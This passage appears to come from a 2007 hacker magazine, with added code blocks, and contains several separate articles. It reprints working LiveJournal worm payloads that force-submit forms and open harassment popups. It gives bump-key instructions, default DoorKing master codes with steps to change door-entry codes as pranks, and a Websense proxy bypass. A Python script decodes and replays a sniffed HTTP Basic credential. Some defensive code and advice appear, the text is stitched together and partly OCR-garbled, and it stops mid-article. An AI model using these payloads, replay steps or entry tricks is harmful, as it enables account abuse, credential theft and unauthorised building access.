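const SMUGGLED = 'http://img.photobucket.com/albums/example/x.swf"height="1"width="1"AllowScriptAccess="always';

// Renders both inputs through both renderers so the difference is visible.
function demo() {
  return {
    vulnerableBenign: renderVideoVulnerable(BENIGN),
    vulnerableSmuggled: renderVideoVulnerable(SMUGGLED),
    hardenedBenign: renderVideoHardened(BENIGN),
    hardenedSmuggled: renderVideoHardened(SMUGGLED),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

Run it with node and compare the four strings demo() returns: the vulnerable renderer carries AllowScriptAccess="always" straight through as a new attribute, while the hardened one returns null for the same input. The layering matters: the character check stops the quote, parsing through URL stops scheme and credential tricks the character check alone would pass, and emitting the security attributes server-side means a future parser bug still cannot turn script access on.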
I downloaded a trial version of Flash 8 and struggled with this monster application's awkward interface until I figured out where I needed to drop my load, after which it became extremely simple.
getURL("javascript:document.write('<form method=post name=esr2006 action=http://www.livejournal.com/interests.bml><input type=hidden name=mode value=add><input type=hidden name=intid value=456049><input type=submit value=ESR></form>');document.esr2006.submit();");
It basically uses a single URL in order to write a little HTML form, then click on the submit button. After it ran for a couple of hours in a popular but much disliked community, I shut it off and tried some other things.
Another person proved it possible to write a posting worm, in spite of LiveJournal's separation of domains, because since that time they have added another feature, livejournal.com/portal/, that shows "friends' entries" on the main livejournal site, which made it possible to use JavaScript to manipulate the new post page, located at livejournal.com/update.bml. This code was never released into the wild, and was only tested in a sterilized form.
The following code was used by a troll, apparently an obese orange cat, posting in the "proanorexia" community:
getURL("javascript:document.write('<html><body><script language=\"JavaScript\">
function rUrl() { var cdate = 0; var sex = 0; targurl = new Array(4);
targurl[0] = \"Donut_Girl\"; targurl[1] = \"Ronders\"; targurl[2] = \"Andikins\";
targurl[3] = \"Shay\"; var ran = 60/targurl.length; cdate = new Date();
sex = cdate.getSeconds(); sex = Math.floor(sex/ran);
return(\"http://encyclopediadramatica.com/index.php/\" + targurl[sex]); }
function popupMe(){myleft=100;mytop=100;settings=\"top=\" + mytop + \",left=\" +
myleft + \",width=900,height=800,location=no,directories=no,menubar=no,toolbar=no,
status=no,scrollbars=yes,resizable=yes,fullscreen=yes\";
PopupWin=window.open(rUrl(),\"Popupwin\", settings);PopupWin.blur();}
</script><form method=post name=esr2006 action=http://www.livejournal.com/interests.bml>
<input type=hidden name=mode value=add><input type=hidden name=intid value=456049>
<input type=submit value=ESR></form></body></html>'); popupMe(); document.esr2006.submit();");
This is the final known example of this exploit in a functional form, which not only made users interested in Exxon Seal Remover, but then triggered an aggressive popup of one of four fucked-up-people pages from Encyclopedia Dramatica.
What can we learn from the past, with respect to development and security? At first glance, it would appear that this is just a more advanced version of the same damn thing that happened with Exxon Seal Remover in 2001 (see http://www.livejournal.com/tools/memories.bml?user=acpizza&keyword=Exxon+Seal+Remover+bugfix) where image tags weren't being properly filtered and allowed for manipulation of the user's interests, or, in the 21-January-20m entry, to launch the user's mail client with a shocking message (it initially said something else).
On the other hand, one has to take into account reality, something we hackers often overlook. While only having a day or two of significant downtime in the last half dozen years, LiveJournal.com has been completely overtaken in popularity by the bug-ridden Swiss cheese that is MySpace.com, and that's because MySpace.com used the same philosophy that Microsoft has used in all their products (and perhaps until recently with their OS): Get it working, now. Fix it when it breaks. In a world with no real corporate responsibility, fixing security holes before they are exploits or spending time creating quality code is a losing business model. That saddens me deeply, but that's an unfortunate reality.
Kudos to the 805 and the 602.
Greetings from 30,000 feet, and welcome to another action-packed episode of the "Telecom Informer!" It's late February and my little project in Spencer, Iowa just ended. Thanks to the money I made, I'm winging my way over the Tasman Sea - on an Air New Zealand flight between Wellington and Melbourne, Australia!
So what was happening in Spencer? Fun stuff! Too bad it's over. If you're a regular reader of my articles, you've probably heard of access charges and the Universal Service Fund, aka USF. If not, here's a quick refresher: long distance calls have several chargeable components, which are built into the few cents per minute (or less) you pay to your long distance carrier.
When you make a long distance call, your local exchange carrier (LEC) delivers the call to your long distance carrier at the tandem. For this, they charge a small fee to the long distance carrier, usually a fraction of a cent per minute. Your long distance carrier takes the call over their network to the tandem switch nearest the call destination, where a termination fee is paid to the LEC on the other end. This is usually also only a fraction of a cent per minute, but in certain high cost rural areas, it can be over ten cents per minute. These charges are called "access charges" and they're the reason why long distance calls cost money and Internet-only VoIP calls are free.
For a long time, carriers such as International Telecom Ltd. (based in Seattle, WA) have taken advantage of access charges by hosting free conference bridges, chat lines, and other services - anything that generates a lot of inbound traffic. You can get free unified messaging from k7.net, free teleconferences from mrconference.com, and even free dial-up Internet service from nocharge.com (in the Seattle and Boston areas). Free international calls, however, hadn't been offered until someone got a little creative in Spencer, Iowa.
Why Spencer? It's located in the remote Iowa Great Lakes region. It's very expensive to provide local service to this rural area and access charges are, as you might imagine, correspondingly high. However, thanks to USF grants Spencer has plenty of fast Internet connectivity. VoIP termination to many foreign countries, meanwhile, is incredibly cheap, so long as you're terminating to landlines. So you can probably see where this is going. A simple game of arbitrage! Call nearly anywhere in the developed world (well, landlines in about 40 countries actually) for only the cost of a phone call to Iowa! Effectively, if you had a cellular plan offering unlimited night and weekend minutes, you could make unlimited off-peak international calls. And done right, anyone offering this service could make a half cent per minute or more, splitting revenues with a local partner in Spencer.
Well, the implementation worked beautifully. The soft PBXs handling the calls were lean, mean, moneymaking machines. Unfortunately, I hear this really ticked off the long distance carriers. Rumor has it they started putting pressure on NECA, the FCC, and anyone who would listen. Presumably under the mounting pressure of legal threats, our partner in Iowa pulled the rug out from under us. It was fun while it lasted though, because prank calling random people in Hong Kong at two in the morning was a lot more interesting than most of the calls that pass through my central office.
After the past couple of months' craziness (we were terminating over 10,000 minutes per hour to China alone), I needed a break - at least until I can dream up a better idea. So I took the opportunity to visit the lovely south island of New Zealand. Of course, I checked out the telecommunications landscape as well as the glaciers, mountains, and beaches. New Zealand telecom is in transition, in some areas more liberalized than others but rapidly modernizing nonetheless.
Cellular services are the unexpected dinosaurs - still a duopoly, as was the case five years ago on my last visit. Vodafone operates GSM with EDGE and GPRS data service and Telecom NZ operates CDMA (3G 1xEV-DO
service is offered in major metropolitan areas, but small outlying areas still have only IS-95 coverage - not even 1xRTT). Wireless service is insanely expensive by U.S. standards. Incoming calls are billed on a "caller pays" basis. Cellular phones are all in special area codes in the 02x series and it's outrageously expensive to call anything in these area codes. You can literally set up a three-way call from a landline between China, New Zealand, and the U.S. for less than one third the cost of making a local call to a mobile phone in Auckland. (For example, from a payphone local calls to a mobile phone cost NZ$1.20 per minute.)
When I last visited, Telecom NZ was beginning to offer DSL services. A 64Kbps/128Kbps line with metered bandwidth started at about NZ$70 per month, and the price went up sharply depending upon how much data you transferred. Competition has, fortunately, driven prices down. New Zealand has adopted a regulatory approach similar to the U.S., unbundling the DSL and Internet components. It has worked and broadband prices are fairly reasonable; 128Kbps/4096Kbps service runs about NZ$50 per month. However, there is a vague "fair use policy" attached to these plans. Basically, if you run peer-to-peer applications, bad things will happen (such as throttling, traffic shaping, and other QoS measures). From most providers, for about NZ$120 per month, you can get 200GB of transfer that is not subject to the same QoS restrictions.
WiFi is beginning to pop up in more places, although it's not nearly as common as in North America. Unfortunately, Kiwis try to charge for it nearly everywhere the service is available to the public - usually at outrageous rates and with heavy filtering. I sought out unsecured access points instead - SSID of LINKSYS, anyone?
While my CDMA handset was able to roam in New Zealand, the cost of doing so was $2.19 per minute - prohibitively expensive for all but billionaires. I opted to let calls go to voice mail instead, and I was pleased to see that Caller ID and incoming SMS were delivered correctly. Payphones were a much more economical means of communicating. Unfortunately, there isn't any one best way to make a call from a payphone in New Zealand, so this required some research and creativity.
The easiest way to call from a payphone is to buy a Telecom NZ prepaid calling card. In fact, if you're calling anything other than a toll-free number, it's the only way to make calls from a payphone. I didn't see a single payphone on the entire south island that accepted coins. Unfortunately, using Telecom NZ is also one of the most expensive ways to call from a payphone, and is only practical for local calls (which are untimed and cost NZ$0.70).
Telecom NZ prepaid calling cards are sold at nearly every retail outlet. They have smart cards on them, and work similarly to the QuorTech Millennium stored value smart cards (still available from Bell Canada, although most other LECs in North America have given up on them). You stick it in the slot, the remaining value is displayed on the console, you dial, and the diminishing value is refreshed each minute as your call progresses.
Using a prepaid calling card purchased in the U.S. is another option. Costco sells an MCI calling card that can be used for international origination. However, the rates are about US$0.35 per minute for calls back to the U.S., and are nearly US$1 per minute for calls within New Zealand. While sometimes good for short (one to two minute) calls from payphones, it was prohibitively expensive to use these for long calls. The toll-free country direct numbers in New Zealand are 000-912 for MCI, 000-913 for AT&T, and 000-999 for Sprint. These numbers can be used for making collect calls, and all of the carriers will transfer you to their respective business offices as well (since Verizon owns MCI now, MCI can transfer you to Verizon Wireless customer service - handy if you're having trouble with your international roaming service).
Finally, there is a burgeoning industry in third party VoIP-based prepaid calling cards, with rates at about NZ$0.04 per minute. Of course, there's a catch: you have to dial through a local gateway and, being VoIP, the quality can sometimes be inconsistent. I ended up carrying two calling cards - one Telecom NZ card used to connect to the local gateway and a separate prepaid calling card to call from there to my final destination. You can make multiple consecutive calls without redialing the gateway number, which means you only pay Telecom NZ for one call. I used a GoTalk card, which offered excellent call quality and had local access numbers nearly everywhere in New Zealand.
Well, the captain informs me that it's time to put away portable electronic devices, so it's time to bring this issue of the "Telecom Informer" - and my laptop - to a close. Next stop, the land of kangaroos, wallabies, and Telstra!
Avoiding Internet Filtering
by Major Lump
MajorLump@hotmail.com
"Yes, no, maybe so," goes the childhood phrase. My friends and I took great delight in endlessly repeating what we thought was such a clever little rhyme. For the hacker, however, this phrase rings particularly true. System administrators often think in terms of black and white (the "yes" and "no") while the hacker sees shades of gray (the "maybe so"). The average computer user often assumes he cannot outsmart or outthink the trained professional. When stacking the teenage power user against the professional system administrator, it would seem the administrator would have the advantage. Not so. The gray scale always defeats the black and white.
I was recently surfing the Internet at my school when I decided to pay a visit to 2600.com. I typed in the URL, pressed enter, and waited for the page. Rather than the green 2600 logo, a blue "Websense" logo stared me in the face. It turned out that all hacking-related websites are blocked, as well as other "inappropriate" material. Since I attend a rather liberal, prestigious prep school (no, I'm not a snob), I was surprised that the system administrator governed with such an iron fist. Surely a school that encourages freedom of speech would not use a content blocker and thus stoop to the level of many foreign governments (the ones we shun). I knew I needed to find a solution to the problem and regain my freedom.
Google, as many hackers know, is a great information miner. I quickly directed my browser to Google and searched for "hacking websense". The tenth hit (Security ForumX - A workaround to Websense) did the trick. Nicely outlined in front of me was a hack for avoiding the watchful eye of Websense. I learned, from reading the article, that the Websense filter does not monitor https connections (which use the SSL protocol). I am not sure exactly why, but I suspect that it is either due to the encryption (SSL) or the protocol (SSL uses port 443 rather than port 80). Either way, a user can access a proxy through an https connection and thus liberate their web browsing habits. After trying a few proxies, my favorite was https://www.proxyweb.net, but others include MegaProxy (https://megaproxy.com) and Proxify (https://www.proxify.com). For a list of great proxies and other goodies visit http://www.proxyway.com/www/freeproxy-server-list.html, http://tools.rosinstrument.com/proxy/, or just Google for it ("free proxies https" will do the trick).
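As an added example from the administrator's side (this is not from the article and not Websense's own logic), the JavaScript below walks a few constructed proxy access-log lines through two policies: one that classifies only plaintext URLs, which is the behaviour the article observed, and one that also classifies the host of a CONNECT tunnel. The log format, the host names and the category table are all made up for the example; the point it shows is that an https request reaches the proxy as a CONNECT with nothing but a host and port, so a filter that only looks at URLs has nothing to block.

```javascript
// Added example, not from the article or any filtering product. The log
// format, host names and category table below are constructed.

// Constructed category table: what the content filter knows about.
const CATEGORY = {
  "www.example-news.test": "news",
  "2600.com": "hacking",                      // the category the article ran into
  "www.example-school.test": "education",
  "anon-proxy.example.test": "proxy-avoidance",
};
const BLOCKED_CATEGORIES = new Set(["hacking", "proxy-avoidance"]);

// Constructed log lines: "timestamp client method target status".
// https browsing shows up as CONNECT host:443, never as a GET with a URL.
const ACCESS_LOG = [
  "1172000001 10.1.2.3 GET http://www.example-news.test/index.html 200",
  "1172000002 10.1.2.3 GET http://2600.com/ 403",
  "1172000003 10.1.2.3 CONNECT anon-proxy.example.test:443 200",
  "1172000004 10.1.2.4 CONNECT www.example-school.test:443 200",
  "1172000005 10.1.2.3 CONNECT 203.0.113.7:443 200",
  "1172000006 10.1.2.4 CONNECT cdn-unknown.example.test:443 200",
];

function parseLine(line) {
  const [ts, client, method, target, status] = line.trim().split(/\s+/);
  let host, port;
  if (method === "CONNECT") {
    [host, port] = target.split(":");
  } else {
    const u = new URL(target);
    host = u.hostname;
    port = u.port || (u.protocol === "https:" ? "443" : "80");
  }
  return { ts: Number(ts), client, method, target, host,
           port: Number(port), status: Number(status) };
}

function categoryOf(host) {
  return CATEGORY[host] || "unclassified";
}

// Shape of the filter the article met: only plaintext requests carry a URL
// to categorise, and a CONNECT tunnel is simply passed through.
function urlOnlyDecision(e) {
  if (e.method !== "CONNECT" && BLOCKED_CATEGORIES.has(categoryOf(e.host))) return "block";
  return "allow";
}

// Tunnel-aware: the CONNECT host is categorised too. Unclassified hosts and
// bare IP literals on 443 are where anonymising proxies tend to sit, so they
// are escalated for review rather than silently allowed.
function tunnelAwareDecision(e) {
  const cat = categoryOf(e.host);
  if (BLOCKED_CATEGORIES.has(cat)) return "block";
  if (e.method === "CONNECT") {
    if (cat === "unclassified" || /^\d{1,3}(\.\d{1,3}){3}$/.test(e.host)) return "review";
  }
  return "allow";
}

// Runs every line through both policies and marks the ones the URL-only
// policy let through that the tunnel-aware policy would not.
function auditLog(lines) {
  return lines.map(parseLine).map(e => {
    const urlOnly = urlOnlyDecision(e);
    const tunnelAware = tunnelAwareDecision(e);
    return { ...e, urlOnly, tunnelAware,
             missed: urlOnly === "allow" && tunnelAware !== "allow" };
  });
}

function missedTunnels(lines) {
  return auditLog(lines).filter(f => f.missed).map(f => f.host);
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(auditLog(ACCESS_LOG).map(f => ({ host: f.host, method: f.method,
    urlOnly: f.urlOnly, tunnelAware: f.tunnelAware, missed: f.missed })));
}
```

Run it with node: missedTunnels(ACCESS_LOG) comes back with the anonymiser, the IP literal and the unclassified host, all of which the URL-only policy allowed because the request was a CONNECT. The "review" outcome is deliberate: most networks cannot block every unclassified TLS destination outright, but they can log and categorise them, which is the step that closes the gap the article describes.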
There is another hack or workaround for extracting information that is blocked by a filter. After outlining the proxy hack, the following concept seems a little quaint. But if the https/SSL proxy does not work, this primitive hack can be an effective last resort. If you want to get a small fact or a tidbit of information from a specific, blocked website, you can use Google's "site:" operator to search the website. After retrieving the results, Google includes two lines of text under the link to each hit. Normally, these tidbits of information would be blocked since they originate from a blocked website. However, Google's results can still paraphrase small sections (two lines) of the target site. The more specific your search terms, the more pertinent the information returned. For example, let's say I would like to find the email address of 2600.com's webmaster. Normally you would go to 2600.com to get this information, but seeing that I am on a filtered network, the site is blocked. However, I can Google this search term:
"site:2600.com email webmaster"
and the second hit gives me the email address: webmaster@2600.com. This hack's major stumbling block is, of course, that only small tidbits of information can be retrieved. However, in dire situations this workaround can be a lifesaver.
Since network filtering is a major issue and affects people all over the world, there is a plethora of online resources discussing hacks and workarounds. If you're interested in learning more I suggest that you visit http://www.zensur.freerk.com, http://peterrost.blogspot.com/200/01/top-ten-methods-to-access-blocked.html, or http://www.webstuffscan.com/2006/11/23/how-to-access-blocked-websites-top-10. Of course, Google is another great resource. Just Google "accessing blocked websites" and
you should have more hits than you know what to do with. Before I end, I would like to just make one last comment. Major props go to Google for their Google Docs and Spreadsheets. I wrote this article on their online text editor and found that it is both easy to use and great for writing "controversial" articles that can't wander into the wrong hands (namely my school's system administrator). It's a hacker's best friend.
Hacking Your Own Front Door
by Clif
The only reason I want 2600-land to know the following is to increase your own security. I've deliberated long and hard, and as this information is public domain anyway and is currently in use by the "bad guys," I trust you will not use it for bad purposes. Rather, using this knowledge maliciously is wrong, stupid, and illegal in practically every country and community in the world. Use it instead to look around your home, work, and possessions and decide what additional measures (also discussed) you wish to take.
Yale is a company that makes locks - primarily the latch-style locks, but also padlocks, etc. Union also makes locks with latch-style keys. You may have seen some at work or on your patio doors. In fact, latch-style key locks are everywhere. Sometimes they're connected to mortise bolts, sometimes to padlocks, sometimes to latch locks, and all of them can be opened by an amateur in less than two seconds. Back up, read that again. I can open your front door in two seconds, leaving no trace, no force, then go to your neighbor and do the same again. And again. So fast that I don't even look suspicious. I have a skeleton key. I'm going to tell you how to make one.
First, the science bit... quick - to the pool table! If you have several balls touching in a line and you fire the cue ball at one end of the line, the ball at the other end shoots away. If you have never tried this, it is the core of at least half of all "trick-shots." (Be a little creative and you've now got a sideshow act as well as a skeleton key - this is a good value article!)
The bit to take away is that the energy is transferred through the chain and moves the end ball. The same principle is involved in this technique, but you need to understand locks to see how this is useful.
Locks have a number of pins (around five for a house key) that are split in one of (usually nine) positions along their length, and which are spring-loaded to interrupt the rotation of the mechanism (see diagrams 1a and 1b for a simplified look). Inserting the (right!) key in the lock pushes all the pins so their splits come into line with the barrel of the mechanism, allowing it to turn. Inserting the wrong key leaves the pins still misaligned so the lock won't turn. A very simple mechanism but pure genius when you consider it, giving 9^5 = 59,049 different unique combinations of keys and locks for five pins with nine positions.
Alas, physics has rendered every single one of those 59,049 locks openable with one key, plus a little bump of energy. Because of this, these skeleton keys are called "bump" keys. As with the pool balls, if you can introduce sufficient energy to one end of the ball chain (or in this case, one half of the lock pin), the other end jumps away to absorb the energy (or, in this case, the top half of the pin jumps out of the way, allowing the lock to turn). We do this with a bump key. A bump key is a regular key cut down to the lowest setting (see diagrams 2a for a normal key (my house key, in fact) and 2b (the bump key)). You can do this yourself with a small file. If it takes you more than 20 minutes, really, you're trying too hard!
Make sure you get nice smooth slopes on the bump key - otherwise you may make a key that will go into a lock but not come out again. Very embarrassing when you have to explain to the wife/locksmith!
However, the funnily-shaped key alone will not open all doors... you need some bump too, to jump all the top parts of the pins and allow the barrel to turn. This is the low-tech bit
(Diagram: pin in closed position)
of the show - the back-end of a screwdriver is perfect. In order to pass the energy to the pins, you need to insert your new key, but then pull it out with a click - this is essential. Next, apply a small amount of torque to the key - not a huge amount, just enough (this will come with practice). Finally, hit the top of the bump key with enough force to crack and maybe damage the insides of a hard-boiled egg.
If it's worked, you can twist the key in the direction of the torque you applied. If not, pull the key out one click again and try once more. If you still can't get it to work, you may be hitting too softly, have cut your key too crudely (although it's very tolerant), or be applying too much or too little torque. Experiment a bit!
So now you have a skeleton key for every lock the key will fit. Back up a second. One key and 20 minutes of work just got you access to all 59,049 formations of that lock. Blimey. And don't imagine a $100 lock is better than a $10 one - they're all the same. And padlocks too - if you can get a key to fit the lock (i.e., it is the right size and has the right gating), you can open every instance of that lock. Double Blimey.
Let's consider the implications of this a second. Say you live in a student dorm building where each room has a key on the same lock suite (same shaped keys). Within 20 minutes of moving in, the guy next door could have a key to every room in the building, including the security office! In a dorm building you cannot fit your own locks to the doors - you may as well leave the door open in fact. Is that a padlock on the security barrier at the car park? Suddenly you see it as unlocked - there to let yourself into.
So now you're hopefu l l y i nformed and
worri ed, and wonderi ng how you can protect
yoursel f and your property. Good. Knowl edge
is power, and now you know as much as the
peopl e who want to steal your thi ngs . Have a
l ook at what l ocks you have and what you're
Outer
DDC|
protecti ng wi th those l ocks. There are several
t hi ngs you can do to i mprove your secur i ty.
1 ) Fi t an el ectroni c system ( Expensi ve, but
what fun ! Thi s i s the excuse you've al ways
wanted. ) wi th card access, ret i na scans, RFI D
reader, etc. , etc.
2) Fi t "Chubb" styl e l ocks i n addi ti on to
l atch l ocks. They are the ones whi ch j ust show
a keyhol e t hrough the door on the outsi de.
Th i eves have no way of knowi ng exactl y
what's behi nd t he hol e, so pi cki ng i s harder
work ( i nexpensi ve, but heavy to carry).
3) Regu l ar bol ts are a great addi ti on once
you're on the i nsi de.
4) Get a bi g dog and al arms, etc. - deter
rent factor!
But u l t i matel y, i f someone wants to break
i nto your home, they wi l l . We can ei ther i sol ate
oursel ves through fear i nto l os i ng communi ty,
or we can rea l l y get to know our nei ghbors
and al l keep our eyes out for one another.
And as we come to know and trust our
nei ghbors, we get to bu i l d somethi ng far more
val uabl e than materi al goods are worth anyway
- a feel i ng of secur i ty as wel l as a physi cal l y
more secure nei ghborhood. Whi ch worl d do
you want to l i ve i n? You can make it happen.
You start smal l wi th your own nei ghbors, your
own corri dor, and encourage i t to spread. We
can get our nei ghborhoods back.
Spring 2007 - Page 17

Dorking the DoorKing
by Cadet Crusher
If you live in a newer or renovated apartment building, chances are there is a telephone entry system that controls visitors' access to the building, and chances are it's of the DoorKing brand. I have one of these devices controlling access to my building and it occurred to me one day shortly after moving in to investigate the security of such an access control system after one of my friends used it to enter my building. What piqued my interest was the fact that the phone number of the DoorKing showed up on my Caller ID. So I called it back. Its response was merely a short beep followed by silence, indicating to me that it was awaiting instruction. In order to confirm this assumption, I downloaded the operating manual, conveniently located at http://www.dkaccess.com/English/Telephone_Entry/1835-065-F-8-05.pdf, which covers models 1833, 1834, 1835, and 1837 (figuring out what model your building has is fairly trivial, just match your mental (or digital) picture of your building's model with one on the DoorKing website, www.doorking.com). Indeed it was awaiting command.
Basics of Programming DoorKing Telephone Entry Systems

Before we begin, a standard disclaimer is in order: I provide this information for educational purposes and am not responsible for what any individual may do with it.

The most important thing to note is that all of the following programming steps must be executed on the box's keypad. Dial-in programming access is only supported via the DoorKing Remote Account Manager software (which I haven't had the opportunity to examine yet - more on that in the future). Another point to note is that the box will give you feedback as you give it instructions: a short beep will be emitted after each successful program step, and a long beep (beeeeeeep, as the manual states) will signal end of programming. Lastly, you will need the master code for the box. Conveniently for us the factory code is 9999. If the master code has been changed I suggest trying 1234, 1111-8888, or the building's address (I have a feeling you'll be in luck). One more thing: when you see something like *07 in the steps below, that means press * then 0 then 7 unless otherwise stated. Good, now we can get to the fun stuff.
Setting Tone/Pulse Dialing

This is the easiest thing to make the box do (as well as quite humorous). Just follow these steps:

1) Dial *07 then the master code.
2) Dial 0* for tone dialing or 1* for pulse dialing.
3) Press 0 and # together to end the programming cycle.

It's that easy! Now you can watch everyone's befuddled looks as they wait for the box to dial using pulses.
Changing Tone Open Codes

Tone open codes are what the called party (the resident) must dial from his or her phone to unlock the door for the guest. From the manual:

1) Dial *05 then the master code.
2) Dial 0*, 1*, or 2* to designate which relay you wish to program. Most likely it is Relay 0 or 1. Each box can control three doors/gates, one per relay.
3) Dial the new tone open code. This will be four digits. If you want to make it one digit, like 9, then you would dial 9###. Each # is a blank digit. The defaults are Relay 0 = ####, Relay 1 = 9876, Relay 2 = 5432.
4) Press 0 and # together to end the programming cycle.

I should mention what Relays 0-2 are. The box has three relays; one relay can control one door/gate. We are most interested in Relay 0 as it is the primary relay and most likely the one controlling the door/gate we wish to command. Now only you will know the proper tone open code, so everyone else will have to get up off the couch to let their visitors in.
Other Capabilities

Programming the box from the keypad allows for a plethora of mischief to be done. Here are just a few things possible: changing four digit entry codes, setting the welcome message, setting the door open time (how long the relay will keep the door unlocked after access is granted), erasing the entire directory, and, by far the most unsettling, reverse lookups of directory codes to resident phone numbers. All of these functions and more can be found in the manual (refer to the URL above). Please use discretion when exploring this system. Don't disable any of the locks or do anything that would compromise the security of the building. Remember we're here to learn.

Conclusion

Dorking a DoorKing entry system is astonishingly simple. I was surprised to find that so much was programmable using the keypad interface and a measly four digit master code. The above examples are harmless pranks, but the possibility for much more malicious actions does exist. It does have an RS-232 port tucked away behind its locked face plate and most models have a 56k modem built in for programming via the Remote Account Management software, so I assume the ability to program it via the keypad is a failsafe in case no other programming methods are available. Oh well, at least you can reset the system's welcome message to let everyone in your building know that you "pwnd this place d00d".
by Xyzzy

Like most people I don't go looking for trouble. I've never made a hobby of trying to steal passwords or violate people's privacy. But when an opportunity slaps you right in the face, I'm as curious as the next person. This is the story of one of those opportunities. I'm not here to demonstrate any elite hack, just to share information with you about a vulnerability at Time Warner Cable in the hopes that this large company will do something to fix their lax security.

It all started when a Time Warner Cable technician arrived at my house to fix intermittent downtime on my cable Internet connection. After poking around and diagnosing very little (my connection happened to be up at the time), the technician sat down at my laptop, opened a browser, and started typing. Now I was interested. The technician opened the URL tech.nyc.rr.com and logged into the page using an htaccess window. Now if you were me, wouldn't you wish you had a key logger running right about now? Well, I keep a key logger running 24/7 on my laptop, so good thing you're not me. Hello user name and password, nice to meet you.

But just for kicks let's pretend I didn't have a key logger running. The technician diligently closed the browser window when he finished, but he neglected to quit the browser entirely. This means that his authorization session was still cached. Launch your favorite packet sniffer, reload tech.nyc.rr.com in the browser, and voila! You have captured the HTTP header containing the technician's authorization login. It's encoded of course (HTTP Basic authentication is base64, not a hash, so the password itself is one decode away), but we don't care. Now switch over to telnet and connect to tech.nyc.rr.com on port 80. Simulate a web request with the following HTTP commands, followed by two new lines:

    GET / HTTP/1.1
    Authorization: Basic <technician's encoded login goes here>
    Host: tech.nyc.rr.com

Congratulations, you're a spoof. Now you may wonder what treasures await us on this mysterious web page? Not much, but enough. The "tech.nyc.rr.com" page is a diagnostic page that shows basic information about a Time Warner customer's account and cable modem. The page is titled "ServiceCertificate version 4.0.0" which is not a commercial product as far as I can tell (someone please correct me if you know more). The page displays the customer's account number, name, address, and phone number. This is interesting, because only the customer name, address, and phone number are used to authenticate incoming callers on Time Warner telephone support. Let the social engineering begin.

The page also includes the IP and MAC addresses of the two network interfaces on the modem: the downstream Ethernet link and the upstream DOCSIS link. It also lists the UBR host name that the modem connects to, plus stats on upload and download bandwidth, the modem uptime, and the modem firmware version and firmware filename. At the bottom is an HTML text box labeled "Comments." I didn't play with this, but I'm sure you can think of something fun. The web server is running Apache version 1.3.29 and PHP version 5.0.2. Directory indexing is turned on.
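The replay step described above, as an added Python example that is not part of the original article: it parses a captured request (constructed here, with a made-up login), decodes the Basic token to show that it is base64 rather than a hash, rebuilds the three-line request typed into telnet, and, for the defender, flags Basic credentials seen over plain port 80. tech.nyc.rr.com is the host named in the article; the credentials and the other headers are assumptions.

```python
"""Replay of a sniffed HTTP Basic Authorization header.

Added example, not code from the original article. The captured request
below is constructed for illustration; the host name is the one named in
the article, the login in the Basic token is made up.
"""
import base64
from typing import Dict, Tuple

# Constructed sample: what a packet sniffer shows when the technician's
# browser reloads the page with its cached credentials (fake login).
CAPTURED_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: tech.nyc.rr.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Authorization: Basic dGVjaDEyMzQ6aHVudGVyMg==\r\n"
    b"Accept: */*\r\n"
    b"\r\n"
)


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request into its request line and a header dict."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    request_line = lines[0]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def extract_basic_credentials(headers: Dict[str, str]) -> Tuple[str, str]:
    """Decode an HTTP Basic credential: it is base64("user:password"), not a hash."""
    scheme, _, token = headers["authorization"].partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not Basic authentication: " + scheme)
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def build_replay(headers: Dict[str, str], path: str = "/") -> bytes:
    """The minimal request the article types into telnet. The Basic token is
    replayed as-is; knowing the password is not even necessary."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {headers['host']}\r\n"
        f"Authorization: {headers['authorization']}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def plaintext_basic_auth_alert(raw: bytes, on_tls: bool) -> bool:
    """Detection side: a Basic credential carried over plain TCP/80 is a finding."""
    _, headers = parse_request(raw)
    return (not on_tls) and headers.get("authorization", "").lower().startswith("basic ")


if __name__ == "__main__":
    request_line, hdrs = parse_request(CAPTURED_REQUEST)
    print(request_line, extract_basic_credentials(hdrs))
    print(build_replay(hdrs).decode("ascii"))
```

Sending the replay over TLS instead of port 80 would stop the sniffer, but not a technician who logs in from a customer's keyboard; the two fixes in the open letter below address different halves of this.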
I also noted that the technician hadn't entered any information about my account before loading this page, meaning that the server must use my connection's network address (the source IP of the request, not anything that was typed in) as the variable used to determine what customer account to display. Hmmm, this could be fun. Anyone interested in a little war walking? What's to stop me from grabbing my laptop, walking down the street and trying this technique on any open wifi node, thereby gleaning the account number, customer name, address, and phone number for that connection? My indefatigable moral compass? Ah yes, I forgot about that.

Now comes the open letter to Time Warner Cable:

Dear Newbs,

Here are some tips on how to improve your security.

First, don't send passwords to servers as clear text even if they're encoded (Basic auth is base64, not a hash). That's what SSL is for.

Second, does the expression "honey pot" mean anything to you? Prohibit your technicians from using customer computers to log into anything. Physical access is inherently insecure. Write that on the board a hundred times until you memorize it.

Next, don't include an entire customer account dossier on any web page, password protected or not. If you don't understand why this is bad practice, well then I can't explain it to you.

Finally, don't use network addresses as authentication variables of any kind. This is trivial to spoof and exploit, particularly in the age of open wifi nodes.

Oh, and please fix the intermittent downtime on my cable connection because it's still busted.

M'kay thanks.

Hacking My Ambulance
by anonymous

For the last three plus years I have worked for a competitor to the nation's largest private ambulance provider, American Medical Response. Like most people in the industry I have learned to loathe this monster for its all-too-corporate business strategies and its overwhelming quest for higher profits - often at the expense of reliable quality personnel and equipment. Recently I completed my paramedic internship with a paramedic preceptor who works for AMR and I was treated to some inside information while interning. Having a
technical background, my ears perked up when things were being discussed and my preceptor had no qualms about letting me poke around here and there. In this article I will share what I learned about AMR's field computers during my internship.

In some regions AMR is now utilizing notebook computers for charting purposes. A field chart is different from an in-hospital chart in that it contains all of the patient's billing information as part of the medical record recorded by medical personnel. In other words, protected personal information
is gathered and recorded by the EMTs and paramedics that operate on the ambulance. This information is then transmitted electronically to an ODBC database that the company's billing department accesses via daily queries and assembles invoices from the data gathered. Because acceptable levels of security are typically more expensive than lower levels, AMR has, in its corporate wisdom, chosen the latter of the two. Let's explore.

